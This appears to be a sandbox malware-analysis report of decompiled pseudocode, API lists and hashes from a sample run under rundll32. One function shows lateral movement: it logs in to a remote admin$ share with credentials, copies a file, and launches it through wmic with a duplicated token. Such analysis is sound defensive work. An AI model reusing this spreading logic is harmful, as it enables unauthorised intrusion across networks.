                                                                                                                                                              • Instruction Fuzzy Hash: 9911B9727002199FE764CE69D985F6EB7AAEB80B14F18512DE905DB184D770ED009760
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E26DA4(signed int __eax, void* __ecx, struct _CRITICAL_SECTION* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				signed int _t35;
                                                                                                                                                              				signed int _t43;
                                                                                                                                                              				intOrPtr* _t48;
                                                                                                                                                              				signed int _t54;
                                                                                                                                                              				struct _CRITICAL_SECTION* _t56;
                                                                                                                                                              
                                                                                                                                                              				_t56 = __esi;
                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                              				_t43 = __eax;
                                                                                                                                                              				if(__esi == 0) {
                                                                                                                                                              					L8:
                                                                                                                                                              					return _v8;
                                                                                                                                                              				}
                                                                                                                                                              				EnterCriticalSection(__esi);
                                                                                                                                                              				_t54 = _t43;
                                                                                                                                                              				if(_t43 >=  *((intOrPtr*)(__esi + 0x24)) + _t43) {
                                                                                                                                                              					L7:
                                                                                                                                                              					LeaveCriticalSection(_t56);
                                                                                                                                                              					goto L8;
                                                                                                                                                              				} else {
                                                                                                                                                              					goto L2;
                                                                                                                                                              				}
                                                                                                                                                              				while(1) {
                                                                                                                                                              					L2:
                                                                                                                                                              					_t35 =  *((intOrPtr*)(_t56 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t56 + 0x18)) + _t54 %  *(_t56 + 0x24) * 4)))), _a4,  *((intOrPtr*)(_t56 + 0x1c)));
                                                                                                                                                              					_v8 = _t35;
                                                                                                                                                              					if(_t35 != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t54 = _t54 + 1;
                                                                                                                                                              					if(_t54 <  *(_t56 + 0x24) + _t43) {
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              					goto L7;
                                                                                                                                                              				}
                                                                                                                                                              				_t48 = _a8;
                                                                                                                                                              				if(_t48 != 0) {
                                                                                                                                                              					 *_t48 =  *((intOrPtr*)( *((intOrPtr*)(_t56 + 0x18)) + _t54 %  *(_t56 + 0x24) * 4));
                                                                                                                                                              				}
                                                                                                                                                              				goto L7;
                                                                                                                                                              			}









                                                                                                                                                              0x04e26da4
                                                                                                                                                              0x04e26da8
                                                                                                                                                              0x04e26dad
                                                                                                                                                              0x04e26db1
                                                                                                                                                              0x04e26e13
                                                                                                                                                              0x04e26e18
                                                                                                                                                              0x04e26e18
                                                                                                                                                              0x04e26db5
                                                                                                                                                              0x04e26dc0
                                                                                                                                                              0x04e26dc4
                                                                                                                                                              0x04e26e0b
                                                                                                                                                              0x04e26e0c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e26dc6
                                                                                                                                                              0x04e26dc6
                                                                                                                                                              0x04e26ddd
                                                                                                                                                              0x04e26de0
                                                                                                                                                              0x04e26de5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e26dea
                                                                                                                                                              0x04e26def
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e26df1
                                                                                                                                                              0x04e26df3
                                                                                                                                                              0x04e26df8
                                                                                                                                                              0x04e26e09
                                                                                                                                                              0x04e26e09
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,04E26E98,?,00000000,?,?,04E26A84,?,?), ref: 04E26DB5
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,04E26E98,?,00000000,?,?,04E26A84,?,?), ref: 04E26E0C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                              • Opcode ID: 6c5fe36c7a4bd7a8511e21d9da78154e683c6c1921d720daa5d141cf1f276f2f
                                                                                                                                                              • Instruction ID: af0fea79cfebd1a59ac08c07c6c38a89a6b956364e811ef283adca944613e6e3
                                                                                                                                                              • Opcode Fuzzy Hash: 6c5fe36c7a4bd7a8511e21d9da78154e683c6c1921d720daa5d141cf1f276f2f
                                                                                                                                                              • Instruction Fuzzy Hash: E8116535700A14DFCB25CF6ACA80A9AB7F6FF893087044629E846D7711EB71FE118A90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E04E26AA8(WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                              				signed int _t6;
                                                                                                                                                              
                                                                                                                                                              				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                              					return 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t6 = StrCmpIW(_a4, _a8); // executed
                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                              					return  ~_t6 + 1;
                                                                                                                                                              				}
                                                                                                                                                              			}




                                                                                                                                                              0x04e26aaf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e26ab7
                                                                                                                                                              0x04e26abd
                                                                                                                                                              0x04e26ac5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e26ac7

                                                                                                                                                              APIs
                                                                                                                                                              • StrCmpIW.KERNELBASE(00000000,?), ref: 04E26ABD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: be3b9ffe29aa87c6d86f64a9923284f4cab55ed9eaced1f1aa9ef67bbf24791f
                                                                                                                                                              • Instruction ID: 9a831e270a02c0f31ff7ce160133bf9e4e0468ca491a84b7109212439083e023
                                                                                                                                                              • Opcode Fuzzy Hash: be3b9ffe29aa87c6d86f64a9923284f4cab55ed9eaced1f1aa9ef67bbf24791f
                                                                                                                                                              • Instruction Fuzzy Hash: 57D0A73115411DFEDF115F74CA08BF83798E71030AF04D120B64B840A0D375D1B8DA40
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E2C493(signed int _a8, signed int _a12) {
                                                                                                                                                              				void* _t5;
                                                                                                                                                              
                                                                                                                                                              				_t5 = malloc(_a8 * _a12); // executed
                                                                                                                                                              				return _t5;
                                                                                                                                                              			}




                                                                                                                                                              0x04e2c49e
                                                                                                                                                              0x04e2c4a5

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                              • Opcode ID: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
                                                                                                                                                              • Instruction ID: 7fab7e48de26b275487957e6d92527ea19c595b9533eb03038f4f96bc21cd77c
                                                                                                                                                              • Opcode Fuzzy Hash: 4f30984e569958c364644897db368958a38db670780f4f6cfd8e814dd52d1b5e
                                                                                                                                                              • Instruction Fuzzy Hash: 69B0123355830E5BDF04EFD8EA82C5B73DCEFA8524B405416F91C8F141E931F6104658
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 61%
                                                                                                                                                              			E04E29B63(long _a4, short* _a8, short* _a12, signed int _a16) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				int _v16;
                                                                                                                                                              				void* _v20;
                                                                                                                                                              				int _v24;
                                                                                                                                                              				signed int _v28;
                                                                                                                                                              				void* _v40;
                                                                                                                                                              				void* _v44;
                                                                                                                                                              				void* _v52;
                                                                                                                                                              				void* _v56;
                                                                                                                                                              				void* _v60;
                                                                                                                                                              				short _v68;
                                                                                                                                                              				intOrPtr _v72;
                                                                                                                                                              				void _v112;
                                                                                                                                                              				char _v116;
                                                                                                                                                              				short* _v128;
                                                                                                                                                              				void _v144;
                                                                                                                                                              				struct _NETRESOURCE _v148;
                                                                                                                                                              				short _v668;
                                                                                                                                                              				char _v1188;
                                                                                                                                                              				short _v2748;
                                                                                                                                                              				short _v4796;
                                                                                                                                                              				short _v6844;
                                                                                                                                                              				short _v8892;
                                                                                                                                                              				short _v74428;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				signed int _t112;
                                                                                                                                                              				WCHAR* _t130;
                                                                                                                                                              				void* _t141;
                                                                                                                                                              				int _t144;
                                                                                                                                                              				int _t150;
                                                                                                                                                              				long _t151;
                                                                                                                                                              				signed int _t163;
                                                                                                                                                              				int _t168;
                                                                                                                                                              				signed int _t173;
                                                                                                                                                              				long _t184;
                                                                                                                                                              				WCHAR* _t187;
                                                                                                                                                              				int _t189;
                                                                                                                                                              				signed int _t192;
                                                                                                                                                              				int _t199;
                                                                                                                                                              				void* _t205;
                                                                                                                                                              
                                                                                                                                                              				E04E2A760(0x122bc);
                                                                                                                                                              				_v16 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_v24 = 0;
                                                                                                                                                              				if(_a4 == 0) {
                                                                                                                                                              					_v8 = 0x57;
                                                                                                                                                              					L51:
                                                                                                                                                              					_t112 = _a16;
                                                                                                                                                              					__eflags = _t112;
                                                                                                                                                              					if(_t112 != 0) {
                                                                                                                                                              						 *_t112 = _v24;
                                                                                                                                                              					}
                                                                                                                                                              					SetLastError(_v8);
                                                                                                                                                              					return _v16;
                                                                                                                                                              				}
                                                                                                                                                              				_v668 = 0;
                                                                                                                                                              				wsprintfW( &_v668, L"\\\\%s\\admin$", _a4);
                                                                                                                                                              				_v148 = 0;
                                                                                                                                                              				_t192 = 7;
                                                                                                                                                              				memset( &_v144, 0, _t192 << 2);
                                                                                                                                                              				_v128 =  &_v668;
                                                                                                                                                              				_t199 = 1;
                                                                                                                                                              				_v144 = 1;
                                                                                                                                                              				E04E288D3( &_v1188);
                                                                                                                                                              				_t187 = L"\\\\%ws\\admin$\\%ws";
                                                                                                                                                              				wsprintfW( &_v6844, _t187, _a4,  &_v1188);
                                                                                                                                                              				_v4796 = 0;
                                                                                                                                                              				_v8892 = 0;
                                                                                                                                                              				wsprintfW( &_v4796, _t187, _a4,  &_v1188);
                                                                                                                                                              				_t130 = PathFindExtensionW( &_v4796);
                                                                                                                                                              				if(_t130 != 0) {
                                                                                                                                                              					 *_t130 = 0;
                                                                                                                                                              				}
                                                                                                                                                              				wsprintfW( &_v8892, _t187, _a4, L"cscc.dat");
                                                                                                                                                              				_v28 = _v28 & 0x00000000;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_v24 = WNetAddConnection2W( &_v148, _a12, _a8, 0);
                                                                                                                                                              					if(PathFileExistsW( &_v8892) != 0) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_v8 = GetLastError();
                                                                                                                                                              					_t141 = E04E287E7( *0x4e37b94,  &_v6844,  *0x4e33984);
                                                                                                                                                              					_t189 = 0;
                                                                                                                                                              					if(_t141 != 0) {
                                                                                                                                                              						__eflags = _a8;
                                                                                                                                                              						if(_a8 != 0) {
                                                                                                                                                              							__eflags = _a12;
                                                                                                                                                              							if(_a12 != 0) {
                                                                                                                                                              								E04E268B5(_a8, _a12);
                                                                                                                                                              								 *0x4e33010 = _t199;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_v20 = _t189;
                                                                                                                                                              						_v12 = _t189;
                                                                                                                                                              						_t144 = OpenThreadToken(GetCurrentThread(), 2, _t199,  &_v20);
                                                                                                                                                              						__eflags = _t144;
                                                                                                                                                              						if(_t144 != 0) {
                                                                                                                                                              							DuplicateTokenEx(_v20, 0x2000000, _t189, 2, _t199,  &_v12);
                                                                                                                                                              						}
                                                                                                                                                              						_v74428 = 0;
                                                                                                                                                              						_v2748 = 0;
                                                                                                                                                              						_v44 = _t189;
                                                                                                                                                              						asm("stosd");
                                                                                                                                                              						asm("stosd");
                                                                                                                                                              						asm("stosd");
                                                                                                                                                              						memset( &_v112, _t189, 0x40);
                                                                                                                                                              						_v68 = 0;
                                                                                                                                                              						_v116 = 0x44;
                                                                                                                                                              						_v72 = 1;
                                                                                                                                                              						_t150 = GetSystemDirectoryW( &_v2748, 0x104);
                                                                                                                                                              						__eflags = _t150;
                                                                                                                                                              						if(_t150 == 0) {
                                                                                                                                                              							_t151 = GetLastError();
                                                                                                                                                              							goto L39;
                                                                                                                                                              						} else {
                                                                                                                                                              							PathAppendW( &_v2748, L"wbem\\wmic.exe");
                                                                                                                                                              							__eflags = PathFileExistsW( &_v2748);
                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                              								L41:
                                                                                                                                                              								DeleteFileW( &_v6844);
                                                                                                                                                              								L43:
                                                                                                                                                              								__eflags = _v12 - _t189;
                                                                                                                                                              								if(_v12 != _t189) {
                                                                                                                                                              									CloseHandle(_v12);
                                                                                                                                                              									_v12 = _t189;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _v20 - _t189;
                                                                                                                                                              								if(_v20 != _t189) {
                                                                                                                                                              									CloseHandle(_v20);
                                                                                                                                                              								}
                                                                                                                                                              								_t199 = 1;
                                                                                                                                                              								__eflags = 1;
                                                                                                                                                              								L48:
                                                                                                                                                              								__eflags = _v24;
                                                                                                                                                              								if(_v24 == 0) {
                                                                                                                                                              									WNetCancelConnection2W( &_v668, 0, _t199);
                                                                                                                                                              								}
                                                                                                                                                              								goto L51;
                                                                                                                                                              							}
                                                                                                                                                              							_t163 = E04E29972(_t205 + wsprintfW( &_v74428, L"%ws ",  &_v2748) * 2 - 0x122b8, __eflags, _a4, _a8, _a12);
                                                                                                                                                              							__eflags = _t163;
                                                                                                                                                              							if(_t163 == 0) {
                                                                                                                                                              								L37:
                                                                                                                                                              								_t151 = GetLastError();
                                                                                                                                                              								_t189 = 0;
                                                                                                                                                              								L39:
                                                                                                                                                              								_v8 = _t151;
                                                                                                                                                              								L40:
                                                                                                                                                              								__eflags = _v16 - _t189;
                                                                                                                                                              								if(_v16 != _t189) {
                                                                                                                                                              									goto L43;
                                                                                                                                                              								}
                                                                                                                                                              								goto L41;
                                                                                                                                                              							}
                                                                                                                                                              							_push( &_v44);
                                                                                                                                                              							_push( &_v116);
                                                                                                                                                              							_push(0);
                                                                                                                                                              							_push(0);
                                                                                                                                                              							_push(0x8000000);
                                                                                                                                                              							_push(0);
                                                                                                                                                              							_push(0);
                                                                                                                                                              							_push(0);
                                                                                                                                                              							_push( &_v74428);
                                                                                                                                                              							_push( &_v2748);
                                                                                                                                                              							__eflags = _v12;
                                                                                                                                                              							if(_v12 == 0) {
                                                                                                                                                              								_t168 = CreateProcessW();
                                                                                                                                                              							} else {
                                                                                                                                                              								_t168 = CreateProcessAsUserW(_v12, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
                                                                                                                                                              							}
                                                                                                                                                              							__eflags = _t168;
                                                                                                                                                              							if(_t168 == 0) {
                                                                                                                                                              								goto L37;
                                                                                                                                                              							} else {
                                                                                                                                                              								WaitForSingleObject(_v44, 0xffffffff);
                                                                                                                                                              								_a4 = 0;
                                                                                                                                                              								GetExitCodeProcess(_v44,  &_a4);
                                                                                                                                                              								__eflags = _v52;
                                                                                                                                                              								if(_v52 != 0) {
                                                                                                                                                              									CloseHandle(_v52);
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _v60;
                                                                                                                                                              								if(_v60 != 0) {
                                                                                                                                                              									CloseHandle(_v60);
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _v56;
                                                                                                                                                              								if(_v56 != 0) {
                                                                                                                                                              									CloseHandle(_v56);
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _v40;
                                                                                                                                                              								if(_v40 != 0) {
                                                                                                                                                              									CloseHandle(_v40);
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _v44;
                                                                                                                                                              								if(_v44 != 0) {
                                                                                                                                                              									CloseHandle(_v44);
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _a4;
                                                                                                                                                              								_t173 = 0 | _a4 == 0x00000000;
                                                                                                                                                              								_v16 = _t173;
                                                                                                                                                              								__eflags = _t173;
                                                                                                                                                              								if(_t173 != 0) {
                                                                                                                                                              									_t189 = 0;
                                                                                                                                                              									__eflags = 0;
                                                                                                                                                              									goto L43;
                                                                                                                                                              								} else {
                                                                                                                                                              									_v16 = PathFileExistsW( &_v4796);
                                                                                                                                                              									_t189 = 0;
                                                                                                                                                              									goto L40;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_t184 = GetLastError();
                                                                                                                                                              					_v8 = _t184;
                                                                                                                                                              					if(_t184 == 0x50 || _t184 == 0x35 || _t184 == 0x43 || _v24 != 0x4c3) {
                                                                                                                                                              						goto L48;
                                                                                                                                                              					} else {
                                                                                                                                                              						if(_v28 != 0) {
                                                                                                                                                              							goto L51;
                                                                                                                                                              						}
                                                                                                                                                              						WNetCancelConnection2W( &_v668, 0, _t199);
                                                                                                                                                              						_v28 = _t199;
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_v16 = _t199;
                                                                                                                                                              				goto L48;
                                                                                                                                                              			}












































                                                                                                                                                              0x04e29b6b
                                                                                                                                                              0x04e29b75
                                                                                                                                                              0x04e29b78
                                                                                                                                                              0x04e29b7b
                                                                                                                                                              0x04e29b81
                                                                                                                                                              0x04e29f01
                                                                                                                                                              0x04e29f08
                                                                                                                                                              0x04e29f08
                                                                                                                                                              0x04e29f0b
                                                                                                                                                              0x04e29f0d
                                                                                                                                                              0x04e29f12
                                                                                                                                                              0x04e29f12
                                                                                                                                                              0x04e29f17
                                                                                                                                                              0x04e29f24
                                                                                                                                                              0x04e29f24
                                                                                                                                                              0x04e29b92
                                                                                                                                                              0x04e29ba5
                                                                                                                                                              0x04e29baa
                                                                                                                                                              0x04e29bb4
                                                                                                                                                              0x04e29bbb
                                                                                                                                                              0x04e29bc3
                                                                                                                                                              0x04e29bce
                                                                                                                                                              0x04e29bd0
                                                                                                                                                              0x04e29bd6
                                                                                                                                                              0x04e29be5
                                                                                                                                                              0x04e29bf2
                                                                                                                                                              0x04e29bf6
                                                                                                                                                              0x04e29bfd
                                                                                                                                                              0x04e29c16
                                                                                                                                                              0x04e29c22
                                                                                                                                                              0x04e29c2a
                                                                                                                                                              0x04e29c2e
                                                                                                                                                              0x04e29c2e
                                                                                                                                                              0x04e29c41
                                                                                                                                                              0x04e29c46
                                                                                                                                                              0x04e29c4a
                                                                                                                                                              0x04e29c5f
                                                                                                                                                              0x04e29c71
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29c85
                                                                                                                                                              0x04e29c8f
                                                                                                                                                              0x04e29c94
                                                                                                                                                              0x04e29c98
                                                                                                                                                              0x04e29cf3
                                                                                                                                                              0x04e29cf6
                                                                                                                                                              0x04e29cf8
                                                                                                                                                              0x04e29cfb
                                                                                                                                                              0x04e29d03
                                                                                                                                                              0x04e29d08
                                                                                                                                                              0x04e29d08
                                                                                                                                                              0x04e29cfb
                                                                                                                                                              0x04e29d15
                                                                                                                                                              0x04e29d18
                                                                                                                                                              0x04e29d22
                                                                                                                                                              0x04e29d28
                                                                                                                                                              0x04e29d2a
                                                                                                                                                              0x04e29d3c
                                                                                                                                                              0x04e29d3c
                                                                                                                                                              0x04e29d44
                                                                                                                                                              0x04e29d4b
                                                                                                                                                              0x04e29d52
                                                                                                                                                              0x04e29d58
                                                                                                                                                              0x04e29d59
                                                                                                                                                              0x04e29d5c
                                                                                                                                                              0x04e29d62
                                                                                                                                                              0x04e29d6c
                                                                                                                                                              0x04e29d7c
                                                                                                                                                              0x04e29d83
                                                                                                                                                              0x04e29d8a
                                                                                                                                                              0x04e29d96
                                                                                                                                                              0x04e29d98
                                                                                                                                                              0x04e29eb0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29d9e
                                                                                                                                                              0x04e29daa
                                                                                                                                                              0x04e29dbd
                                                                                                                                                              0x04e29dbf
                                                                                                                                                              0x04e29ebe
                                                                                                                                                              0x04e29ec5
                                                                                                                                                              0x04e29ecf
                                                                                                                                                              0x04e29ecf
                                                                                                                                                              0x04e29ed2
                                                                                                                                                              0x04e29ed7
                                                                                                                                                              0x04e29ed9
                                                                                                                                                              0x04e29ed9
                                                                                                                                                              0x04e29edc
                                                                                                                                                              0x04e29edf
                                                                                                                                                              0x04e29ee4
                                                                                                                                                              0x04e29ee4
                                                                                                                                                              0x04e29ee8
                                                                                                                                                              0x04e29ee8
                                                                                                                                                              0x04e29ee9
                                                                                                                                                              0x04e29ee9
                                                                                                                                                              0x04e29eed
                                                                                                                                                              0x04e29ef9
                                                                                                                                                              0x04e29ef9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29eed
                                                                                                                                                              0x04e29ded
                                                                                                                                                              0x04e29df2
                                                                                                                                                              0x04e29df4
                                                                                                                                                              0x04e29ea6
                                                                                                                                                              0x04e29ea6
                                                                                                                                                              0x04e29eac
                                                                                                                                                              0x04e29eb6
                                                                                                                                                              0x04e29eb6
                                                                                                                                                              0x04e29eb9
                                                                                                                                                              0x04e29eb9
                                                                                                                                                              0x04e29ebc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29ebc
                                                                                                                                                              0x04e29dfd
                                                                                                                                                              0x04e29e03
                                                                                                                                                              0x04e29e04
                                                                                                                                                              0x04e29e05
                                                                                                                                                              0x04e29e06
                                                                                                                                                              0x04e29e0b
                                                                                                                                                              0x04e29e0c
                                                                                                                                                              0x04e29e13
                                                                                                                                                              0x04e29e14
                                                                                                                                                              0x04e29e1b
                                                                                                                                                              0x04e29e1c
                                                                                                                                                              0x04e29e1f
                                                                                                                                                              0x04e29e2c
                                                                                                                                                              0x04e29e21
                                                                                                                                                              0x04e29e24
                                                                                                                                                              0x04e29e24
                                                                                                                                                              0x04e29e32
                                                                                                                                                              0x04e29e34
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29e36
                                                                                                                                                              0x04e29e3b
                                                                                                                                                              0x04e29e48
                                                                                                                                                              0x04e29e4b
                                                                                                                                                              0x04e29e51
                                                                                                                                                              0x04e29e54
                                                                                                                                                              0x04e29e59
                                                                                                                                                              0x04e29e59
                                                                                                                                                              0x04e29e5b
                                                                                                                                                              0x04e29e5e
                                                                                                                                                              0x04e29e63
                                                                                                                                                              0x04e29e63
                                                                                                                                                              0x04e29e65
                                                                                                                                                              0x04e29e68
                                                                                                                                                              0x04e29e6d
                                                                                                                                                              0x04e29e6d
                                                                                                                                                              0x04e29e6f
                                                                                                                                                              0x04e29e72
                                                                                                                                                              0x04e29e77
                                                                                                                                                              0x04e29e77
                                                                                                                                                              0x04e29e79
                                                                                                                                                              0x04e29e7c
                                                                                                                                                              0x04e29e81
                                                                                                                                                              0x04e29e81
                                                                                                                                                              0x04e29e85
                                                                                                                                                              0x04e29e88
                                                                                                                                                              0x04e29e8b
                                                                                                                                                              0x04e29e8e
                                                                                                                                                              0x04e29e90
                                                                                                                                                              0x04e29ecd
                                                                                                                                                              0x04e29ecd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29e92
                                                                                                                                                              0x04e29e9f
                                                                                                                                                              0x04e29ea2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29ea2
                                                                                                                                                              0x04e29e90
                                                                                                                                                              0x04e29e34
                                                                                                                                                              0x04e29d98
                                                                                                                                                              0x04e29c9a
                                                                                                                                                              0x04e29ca0
                                                                                                                                                              0x04e29ca6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29ccb
                                                                                                                                                              0x04e29cce
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29cdd
                                                                                                                                                              0x04e29ce3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29ce3
                                                                                                                                                              0x04e29ca6
                                                                                                                                                              0x04e29ceb
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • wsprintfW.USER32 ref: 04E29BA5
                                                                                                                                                                • Part of subcall function 04E288D3: PathFindFileNameW.SHLWAPI(04E37BC8,76B5C0B0,?,04E295B2), ref: 04E288E3
                                                                                                                                                              • wsprintfW.USER32 ref: 04E29BF2
                                                                                                                                                              • wsprintfW.USER32 ref: 04E29C16
                                                                                                                                                              • PathFindExtensionW.SHLWAPI(?), ref: 04E29C22
                                                                                                                                                              • wsprintfW.USER32 ref: 04E29C41
                                                                                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 04E29C59
                                                                                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 04E29C69
                                                                                                                                                              • GetLastError.KERNEL32 ref: 04E29C73
                                                                                                                                                              • GetLastError.KERNEL32(?), ref: 04E29C9A
                                                                                                                                                              • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 04E29CDD
                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 04E29D1B
                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000), ref: 04E29D22
                                                                                                                                                              • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 04E29D3C
                                                                                                                                                              • memset.MSVCRT ref: 04E29D62
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32 ref: 04E29D8A
                                                                                                                                                              • PathAppendW.SHLWAPI(?,wbem\wmic.exe), ref: 04E29DAA
                                                                                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 04E29DB7
                                                                                                                                                              • wsprintfW.USER32 ref: 04E29DD8
                                                                                                                                                              • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,?), ref: 04E29E24
                                                                                                                                                              • CreateProcessW.KERNEL32 ref: 04E29E2C
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000104), ref: 04E29E3B
                                                                                                                                                              • GetExitCodeProcess.KERNEL32 ref: 04E29E4B
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04E29E59
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04E29E63
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04E29E6D
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04E29E77
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000104), ref: 04E29E81
                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,?,?,00000104), ref: 04E29E99
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000104), ref: 04E29EA6
                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 04E29EC5
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 04E29ED7
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 04E29EE4
